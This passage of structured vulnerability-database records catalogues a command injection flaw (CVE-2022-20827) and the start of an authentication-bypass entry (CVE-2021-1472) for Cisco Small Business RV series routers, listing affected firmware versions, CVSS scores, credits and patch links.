                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.05",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.26",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.26",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.26",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.26",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20827",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Q. Kaiser from IoT Inspector Research Lab",
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-1047",
         },
      ],
      trust: 0.7,
   },
   cve: "CVE-2022-20827",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 6,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "HIGH",
                  attackVector: "NETWORK",
                  author: "ykramarz@cisco.com",
                  availabilityImpact: "HIGH",
                  baseScore: 9,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 2.2,
                  impactScore: 6,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 10,
                  baseSeverity: "Critical",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "CVE-2022-20827",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Changed",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT",
                  author: "ZDI",
                  availabilityImpact: "HIGH",
                  baseScore: 8.8,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 2.8,
                  id: "CVE-2022-20827",
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 0.7,
                  userInteraction: "NONE",
                  vectorString: "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2022-20827",
                  trust: 1.8,
                  value: "CRITICAL",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2022-20827",
                  trust: 1,
                  value: "CRITICAL",
               },
               {
                  author: "ZDI",
                  id: "CVE-2022-20827",
                  trust: 0.7,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202208-2168",
                  trust: 0.6,
                  value: "CRITICAL",
               },
            ],
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-1047",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
         {
            db: "NVD",
            id: "CVE-2022-20827",
         },
         {
            db: "NVD",
            id: "CVE-2022-20827",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2168",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business Router products include OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the wfapp application. A crafted server response can trigger execution of a system call composed from a attacker-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. \nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. \nThis advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
      sources: [
         {
            db: "NVD",
            id: "CVE-2022-20827",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
         {
            db: "ZDI",
            id: "ZDI-22-1047",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20827",
         },
      ],
      trust: 2.34,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2022-20827",
            trust: 4,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-016749",
            trust: 0.8,
         },
         {
            db: "ZDI_CAN",
            id: "ZDI-CAN-15984",
            trust: 0.7,
         },
         {
            db: "ZDI",
            id: "ZDI-22-1047",
            trust: 0.7,
         },
         {
            db: "AUSCERT",
            id: "ESB-2022.3837",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2168",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2022-20827",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-1047",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20827",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
         {
            db: "NVD",
            id: "CVE-2022-20827",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2168",
         },
      ],
   },
   id: "VAR-202208-0321",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VARIoT devices database",
            id: null,
         },
      ],
      trust: 0.18174963,
   },
   last_update_date: "2023-12-18T13:27:08.892000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "cisco-sa-sb-mult-vuln-CbVp4SUR",
            trust: 0.8,
            url: "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-mult-vuln-cbvp4sur",
         },
         {
            title: "Cisco has issued an update to correct this vulnerability.",
            trust: 0.7,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-mult-vuln-cbvp4sur",
         },
         {
            title: "Cisco Small Business RV Series Routers Fixes for operating system command injection vulnerabilities",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=204185",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-sb-mult-vuln-cbvp4sur",
         },
         {
            title: "The Register",
            trust: 0.1,
            url: "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-1047",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20827",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2168",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-78",
            trust: 1,
         },
         {
            problemtype: "OS Command injection (CWE-78) [NVD evaluation ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
         {
            db: "NVD",
            id: "CVE-2022-20827",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.4,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-mult-vuln-cbvp4sur",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2022-20827",
         },
         {
            trust: 0.6,
            url: "https://www.auscert.org.au/bulletins/esb-2022.3837",
         },
         {
            trust: 0.6,
            url: "https://cxsecurity.com/cveshow/cve-2022-20827/",
         },
         {
            trust: 0.1,
            url: "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/",
         },
      ],
      sources: [
         {
            db: "ZDI",
            id: "ZDI-22-1047",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20827",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
         {
            db: "NVD",
            id: "CVE-2022-20827",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2168",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "ZDI",
            id: "ZDI-22-1047",
         },
         {
            db: "VULMON",
            id: "CVE-2022-20827",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
         {
            db: "NVD",
            id: "CVE-2022-20827",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202208-2168",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-08-04T00:00:00",
            db: "ZDI",
            id: "ZDI-22-1047",
         },
         {
            date: "2023-10-06T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
         {
            date: "2022-08-10T09:15:08.537000",
            db: "NVD",
            id: "CVE-2022-20827",
         },
         {
            date: "2022-08-04T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202208-2168",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2022-08-04T00:00:00",
            db: "ZDI",
            id: "ZDI-22-1047",
         },
         {
            date: "2023-10-06T06:23:00",
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
         {
            date: "2023-11-07T03:43:04.223000",
            db: "NVD",
            id: "CVE-2022-20827",
         },
         {
            date: "2022-08-15T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202208-2168",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202208-2168",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Cisco Small Business  In router products  OS  Command injection vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-016749",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "operating system commend injection",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202208-2168",
         },
      ],
      trust: 0.6,
   },
}

var-202104-0893
Vulnerability from variot

Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0893",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv345p",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.21",
         },
         {
            model: "rv260w",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.03",
         },
         {
            model: "rv340w",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.21",
         },
         {
            model: "rv260p",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.03",
         },
         {
            model: "rv345",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.21",
         },
         {
            model: "rv340",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.03.21",
         },
         {
            model: "rv260",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.03",
         },
         {
            model: "rv160w",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.03",
         },
         {
            model: "rv160",
            scope: "lt",
            trust: 1,
            vendor: "cisco",
            version: "1.0.01.03",
         },
         {
            model: "rv260w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p dual wan gigabit poe vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w dual wan gigabit wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn router with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-005315",
         },
         {
            db: "NVD",
            id: "CVE-2021-1472",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.03",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.03",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.03",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.03",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.01.03",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.21",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.21",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.21",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "1.0.03.21",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2021-1472",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "T Shiomitsu",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202104-433",
         },
      ],
      trust: 0.6,
   },
   cve: "CVE-2021-1472",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 7.5,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 10,
                  impactScore: 6.4,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Partial",
                  baseScore: 7.5,
                  confidentialityImpact: "Partial",
                  exploitabilityScore: null,
                  id: "CVE-2021-1472",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 9.8,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 3.9,
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "ykramarz@cisco.com",
                  availabilityImpact: "NONE",
                  baseScore: 5.3,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 1.4,
                  integrityImpact: "LOW",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
